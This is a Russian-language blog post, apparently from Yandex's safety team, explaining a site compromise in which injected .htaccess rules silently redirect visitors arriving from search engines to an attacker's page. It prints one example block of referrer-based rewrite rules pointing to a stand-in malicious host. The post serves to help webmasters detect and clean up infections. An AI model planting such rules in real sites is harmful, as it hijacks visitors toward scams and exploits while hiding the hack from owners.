Если человек бежит, расталкивая локтями прохожих, спотыкаясь на ступеньках и не здороваясь, ему кричат вдогонку: «Куда ты?!..»
А он не отвечает и бежит, шлепая по лужам, шумно дыша и устремив вперед невидящий безумный взгляд. Ему орут: «Куда ты?!..»
А его нужно взять за рукав и тихо, душевно спросить:
«Откуда ты?»
А. Кнышев
После того, как Яндекс начал предупреждать пользователей и вебмастеров о зараженных сайтах, мы стали тщательно анализировать обращения в службу поддержки, чтобы понять, какие именно случаи заражения встречаются чаще всего и как можно помочь веб-мастерам их исправить. Одна проблема вызывала больше всего трудностей, расскажем о ней подробнее.
Многие веб-мастера не могут найти в коде своего сайта вредоносный код. И это не удивительно, потому что его там нет. Однако, это не означает, что переход на сайт для конечного пользователя безопасен. Существует схема заражения, при которой пользователь не доходит до настоящего содержимого сайта, так как его уже при первом обращении к серверу автоматически перенаправляют на страницу, указанную злоумышленниками.
Часто редирект осуществляется только при переходе со строго определенных ресурсов, например, поисковых систем или крупных каталогов. Это позволяет злоумышленникам дольше скрывать от веб-мастера факт того, что его сайт взломан. Владельцы сайтов, в отличие от большинства посетителей, чаще всего заходят на свой сайт, вводя его адрес в адресной строке браузера, а не переходя на него с поисковых систем. Поэтому они не видят, что их сайт не в порядке, и могут долгое время не знать о проблемах.
Реализуется такое перенаправление нехитро, в файл .htaccess прописывается примерно такой код:
/** .htaccess **/
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteRule .* httр://vredonosnyj-sajt.net.ru/ [R,L]
В данном случае все пользователи, пришедшие на сайт по ссылкам с Яндекса, Рамблера и Google будут перенаправлены на httр://vredonosnyj-sajt.net.ru/, а во всех остальных случаях посетителям будет показано нормальное содержимое сайта.
Как правило, подменяются файлы .htaccess всех поддиректорий сайта, а не только корневой, а получение доступа к файлу может происходить способом, описанным нами ранее. Аналогичное поведение может быть реализовано и обычным внедряемым в страницу java-скриптом. Но в этом случае вредоносный скрипт будет виден при анализе кода зараженного сайта, просто он будет срабатывать только при переходе из поиска.
Ресурс, который показывается пользователю вместо исходного сайта, может содержать рекламу, порнографию или эксплойт -- все, что угодно злоумышленникам.
В последнее время таким образом все чаще распространяются "фальшивые антивирусы", создающие видимость проверки компьютера пользователя на вирусы и предлагающие активировать полную версию программы за деньги.
Сайты с таким перенаправлением считаются вредоносными, обнаруживаются Яндексом и помечаются в результатах поиска. При этом веб-мастер сайта, который зарегистрировался в службе Я.Вебмастер, получает уведомление, что на его сайте находится вредоносный код. Надеемся, что теперь такие случаи не уйдут от взгляда веб-мастеров.
Группа пролетарского гнева